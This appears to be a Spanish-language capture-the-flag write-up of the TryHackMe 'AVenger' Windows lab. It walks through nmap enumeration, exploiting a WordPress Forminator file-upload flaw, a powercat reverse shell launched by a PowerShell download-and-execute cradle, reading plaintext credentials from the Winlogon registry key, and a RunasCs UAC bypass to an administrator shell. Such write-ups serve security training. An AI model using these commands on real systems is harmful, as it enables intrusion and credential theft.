🦸AVenger (Windows)
You’ve been asked to exploit all the vulnerabilities present.
Enumeración de Red
Script AutoScan
autoscan 10.10.141.171Resultado nmap
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Index of /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 5.5.5-10.4.28
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.28-MariaDB
| Thread ID: 9
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsCompression, SupportsTransactions, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, IgnoreSigpipes, ODBCClient, FoundRows, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: GO6^Z'RHQ>$8+on]d_2y
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIFT
| NetBIOS_Domain_Name: GIFT
| NetBIOS_Computer_Name: GIFT
| DNS_Domain_Name: gift
| DNS_Computer_Name: gift
| Product_Version: 10.0.17763
|_ System_Time: 2025-08-05T10:18:18+00:00
|_ssl-date: 2025-08-05T10:18:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=gift
| Not valid before: 2025-08-04T10:00:35
|_Not valid after: 2026-02-03T10:00:35
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windowsSistema Windows
Enumeración SMB/RPC (Null Session)
smbclient -L //10.10.141.171 -Nsession setup failed: NT_STATUS_ACCESS_DENIED
rpcclient -U "" 10.10.141.171 -Nsession setup failed: NT_STATUS_ACCESS_DENIED
Enumeración de Servicio Web -p80
Resultado nmap
80/tcp open http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp//gift== NetBIOS_Computer_Name: GIFThttp://10.10.141.171/gift→ Redirect:avenger.tryhackme/giftavenger.tryhackme→ /etc/hosts
avenger.tryhackme/gift/
Wordpress 6.2.2
Formulario de Subida de Archivos
DevTools Sources → Plugin: Forminator
avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
Forminator - Version 1.24.1
Explotando: CVE-2023-4596 - Unauthenticated Arbitrary File Upload a RCE
Community PoC Exploit
Error durante la explotación: Archivo PHP malicioso frenado por Antivirus.
Explotación Manual
Powercat
powercat -c <ip-a> -p <port> -e cmd -g > uwu.ps1echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString(‘http://<ip-a>/uwu.ps1')" > uwu.batpython3 -m http.servernc -lvnp <port>Intrusión en el Sistema
Shell: gift\hugo
Enumeración Post-Intrusión
whoami /allNingún permiso útil para escalada
BUILTIN\\Administrators
Mandatory Label\\Medium Mandatory LevelMedium Mandatory Level refers to the integrity level assigned to standard user accounts and processes. It’s a security feature that helps protect the system by limiting the access rights of processes running at this level. This means that even if a user has administrator privileges, their standard user processes will run with a medium integrity level, preventing them from easily modifying system files or other high-integrity resources. UAC utilizes integrity levels to manage user privileges.
Pertenecemos al grupo de administradores pero tenemos restringido el acceso a directorios como los del administrador local.
UAC bypass?
Extracción de Credenciales
reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"Credenciales: hugo:SurpriseMF123!
Escalada de Privilegios: Reverse Shell con UAC Bypass
RunasCs
python3 -m http.serverpowershell
wget http://<ip-a>:<port>/runasCs.exe -o runas.exenc -lvnp <port>runas.exe hugo SurpriseMF123! "powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://<ip-a>:<port>/uwu.ps1')" --bypass-uacNueva reverse shell sin restricción del UAC
whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session DisabledCompromiso del Sistema
Shell: Administrator Account
Última actualización